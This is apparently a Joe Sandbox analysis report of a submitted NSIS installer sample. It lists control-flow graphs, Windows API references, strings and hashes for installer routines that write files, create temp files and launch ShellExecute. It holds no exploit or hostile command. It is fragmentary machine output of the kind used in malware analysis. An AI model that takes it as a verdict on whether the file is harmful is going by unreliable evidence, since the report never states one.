                                                                                          control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00426579,00403792,00000000), ref: 004034FF
                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                          • String ID: (]C$... %d%%$pAB$y%B$yeB
                                                                                          • API String ID: 651206458-504102003
                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                          Strings
                                                                                          • Inst, xrefs: 00403698
                                                                                          • soft, xrefs: 004036A1
                                                                                          • Error launching installer, xrefs: 00403603
                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                          • Null, xrefs: 004036AA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                          • API String ID: 4283519449-527102705
                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(00445D80,00426579,762323A0,00000000), ref: 00404FD6
                                                                                          • lstrlenW.KERNEL32(004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FE6
                                                                                          • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FF9
                                                                                          • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426579,762323A0,00000000), ref: 00406902
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 2740478559-0
                                                                                          • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                          • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                          • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                          • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                          APIs
                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                          • GlobalFree.KERNELBASE(006D3C98), ref: 00402387
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeGloballstrcpyn
                                                                                          • String ID: 153$Exch: stack < %d elements$Pop: stack empty
                                                                                          • API String ID: 1459762280-459361787
                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                          APIs
                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                          • GlobalFree.KERNELBASE(006D3C98), ref: 00402387
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 3376005127-0
                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                          APIs
                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2568930968-0
                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                          APIs
                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                          • String ID: 153$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                          • API String ID: 247603264-1117367297
                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                          APIs
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426579,762323A0,00000000), ref: 00404FD6
                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FE6
                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426579,762323A0,00000000), ref: 00404FF9
                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          Strings
                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                          • API String ID: 3156913733-2180253247
                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountFileNameTempTick
                                                                                          • String ID: nsa
                                                                                          • API String ID: 1716503409-2209301699
                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                          APIs
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
